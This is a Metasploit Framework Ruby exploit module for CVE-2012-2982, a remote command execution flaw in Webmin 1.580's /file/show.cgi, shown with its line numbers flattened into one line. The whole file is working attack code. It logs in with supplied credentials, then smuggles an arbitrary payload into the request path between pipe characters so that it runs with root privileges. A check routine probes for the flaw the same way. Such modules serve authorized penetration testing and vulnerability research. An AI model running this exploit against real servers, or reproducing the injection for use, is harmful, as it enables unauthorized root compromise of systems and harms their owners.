|   1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158  |  ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  def initialize(info = {})  super(update_info(info,  'Name' => 'Webmin /file/show.cgi Remote Command Execution',  'Description'=> %q{  This module exploits an arbitrary command execution vulnerability in Webmin  1.580. The vulnerability exists in the /file/show.cgi component and allows an  authenticated user, with access to the File Manager Module, to execute arbitrary  commands with root privileges. The module has been tested successfully with Webim  1.580 over Ubuntu 10.04.  },  'Author' => [  'Unknown', # From American Information Security Group  'juan vazquez' # Metasploit module  ],  'License'=> MSF_LICENSE,  'References' =>  [  ['OSVDB', '85248'],  ['BID', '55446'],  ['CVE', '2012-2982'],  ['URL', 'http://www.americaninfosec.com/research/dossiers/AISG-12-001.pdf'],  ['URL', 'https://github.com/webmin/webmin/commit/1f1411fe7404ec3ac03e803cfa7e01515e71a213']  ],  'Privileged' => true,  'Payload'=>  {  'DisableNops' => true,  'Space' => 512,  'Compat'=>  {  'PayloadType' => 'cmd',  'RequiredCmd' => 'generic perl bash telnet',  }  },  'Platform' => 'unix',  'Arch' => ARCH_CMD,  'Targets'=> [[ 'Webim 1.580', { }]],  'DisclosureDate' => 'Sep 06 2012',  'DefaultTarget'=> 0))  register_options(  [  Opt::RPORT(10000),  OptBool.new('SSL', [true, 'Use SSL', true]),  OptString.new('USERNAME',[true, 'Webmin Username']),  OptString.new('PASSWORD',[true, 'Webmin Password'])  ], self.class)  end  def check  peer = "#{rhost}:#{rport}"  print_status("#{peer} - Attempting to login...")  data = "page=%2F&user=#{datastore['USERNAME']}&pass=#{datastore['PASSWORD']}"  res = send_request_cgi(  {  'method'=> 'POST',  'uri' => "/session_login.cgi",  'cookie'=> "testing=1",  'data'=> data  }, 25)  if res and res.code == 302 and res.headers['Set-Cookie'] =~ /sid/  print_good "#{peer} - Authentication successful"  session = res.headers['Set-Cookie'].split("sid=")[1].split(";")[0]  else  print_error "#{peer} - Authentication failed"  return Exploit::CheckCode::Unknown  end  print_status("#{peer} - Attempting to execute...")  command = "echo #{rand_text_alphanumeric(rand(5) + 5)}"  res = send_request_cgi(  {  'uri' => "/file/show.cgi/bin/#{rand_text_alphanumeric(5)}|#{command}|",  'cookie'=> "sid=#{session}"  }, 25)  if res and res.code == 200 and res.message =~ /Document follows/  return Exploit::CheckCode::Appears  else  return Exploit::CheckCode::Safe  end  end  def exploit  peer = "#{rhost}:#{rport}"  print_status("#{peer} - Attempting to login...")  data = "page=%2F&user=#{datastore['USERNAME']}&pass=#{datastore['PASSWORD']}"  res = send_request_cgi(  {  'method'=> 'POST',  'uri' => "/session_login.cgi",  'cookie'=> "testing=1",  'data'=> data  }, 25)  if res and res.code == 302 and res.headers['Set-Cookie'] =~ /sid/  session = res.headers['Set-Cookie'].scan(/sid\=(\w+)\;*/).flatten[0] || ''  if session and not session.empty?  print_good "#{peer} - Authentication successfully"  else  print_error "#{peer} - Authentication failed"  return  end  print_good "#{peer} - Authentication successfully"  else  print_error "#{peer} - Authentication failed"  return  end  print_status("#{peer} - Attempting to execute the payload...")  command = payload.encoded  res = send_request_cgi(  {  'uri' => "/file/show.cgi/bin/#{rand_text_alphanumeric(rand(5) + 5)}|#{command}|",  'cookie'=> "sid=#{session}"  }, 25)  if res and res.code == 200 and res.message =~ /Document follows/  print_good "#{peer} - Payload executed successfully"  else  print_error "#{peer} - Error executing the payload"  return  end  end end  |